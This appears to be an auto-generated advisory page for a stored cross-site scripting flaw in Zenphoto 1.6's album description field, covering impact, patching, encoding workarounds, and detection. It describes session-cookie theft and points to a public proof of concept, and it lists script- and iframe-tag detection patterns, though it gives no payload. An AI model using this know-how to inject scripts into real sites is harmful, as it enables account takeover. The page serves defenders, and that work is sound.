CVE-2023-53915 – Zenphoto 1.6 contains a stored cross-site scrip... (How to Fix)

Q: What is the severity of CVE-2023-53915?

CVE-2023-53915 has a CVSS score of 4.6 (MEDIUM). Zenphoto 1.6 contains a stored cross-site scripting vulnerability where authenticated attackers can inject malicious HTML/JavaScript into album descriptions. When users view affected album pages, the malicious scripts execute in their browsers. This affects all Zenphoto 1.6 installations with authenticated user accounts.

📋 TL;DR

Zenphoto 1.6 contains a stored cross-site scripting vulnerability where authenticated attackers can inject malicious HTML/JavaScript into album descriptions. When users view affected album pages, the malicious scripts execute in their browsers. This affects all Zenphoto 1.6 installations with authenticated user accounts.

💻 Affected Systems

Products:

Zenphoto

Versions: 1.6

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Requires authenticated user with album creation privileges. All operating systems running Zenphoto 1.6 are affected.

📦 What is this software?

Zenphoto by Zenphoto

View all CVEs affecting Zenphoto →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal admin session cookies, perform account takeover, deface websites, or redirect users to malicious sites, potentially compromising the entire Zenphoto installation and user data.

🟠

Likely Case

Authenticated users with album creation privileges inject malicious scripts that execute when other users view those albums, potentially stealing session cookies or performing limited client-side attacks.

🟢

If Mitigated

With proper input validation and output encoding, malicious scripts are neutralized and displayed as harmless text rather than executable code.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access. Public proof-of-concept demonstrates HTML injection via album description field.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.6.1

Vendor Advisory: https://www.zenphoto.org/news/zenphoto-1.6/

Restart Required: No

Instructions:

1. Backup your Zenphoto installation and database. 2. Download Zenphoto 1.6.1 from the official website. 3. Replace all files with the new version, preserving your configuration and uploads. 4. Verify the update completed successfully.

🔧 Temporary Workarounds

Input Validation Filter

all

Add server-side input validation to strip or escape HTML tags from album description fields before storage.

Modify album creation/editing code to apply htmlspecialchars() or similar filtering to description input

Output Encoding

all

Implement proper output encoding when displaying album descriptions to prevent script execution.

Ensure all album description outputs use htmlspecialchars() or equivalent encoding

🧯 If You Can't Patch

Restrict album creation privileges to trusted administrators only
Implement web application firewall rules to block HTML/script injection patterns

🔍 How to Verify

Check if Vulnerable:

Check if Zenphoto version is 1.6 by viewing the admin dashboard or checking the version.php file.

Check Version:

Check admin dashboard or examine zp-core/version.php file contents

Verify Fix Applied:

After updating, verify the version shows 1.6.1 in admin dashboard. Test by attempting to inject HTML into album description - it should be displayed as text, not executed.

📡 Detection & Monitoring

Log Indicators:

Unusual album creation/modification patterns
HTML/script tags in album description fields in database logs

Network Indicators:

Unexpected iframe or script tags in album page responses

SIEM Query:

Search for album creation events followed by unusual description content containing <script> or <iframe> tags

📊 Metadata

CVE ID: CVE-2023-53915

CVSS v3 Score: 4.6 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.03% exploit probability (8.2th percentile)

Published: December 17, 2025

Last Updated: December 27, 2025

🔗 References

https://www.exploit-db.com/exploits/51485 Exploit,Third Party Advisory,VDB Entry
https://www.vulncheck.com/advisories/zenphoto-stored-cross-site-scripting-via-album-description Exploit,Third Party Advisory
https://www.zenphoto.org/news/zenphoto-1.6/ Release Notes
https://www.exploit-db.com/exploits/51485 Exploit,Third Party Advisory,VDB Entry

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-53915, you might also want to check these: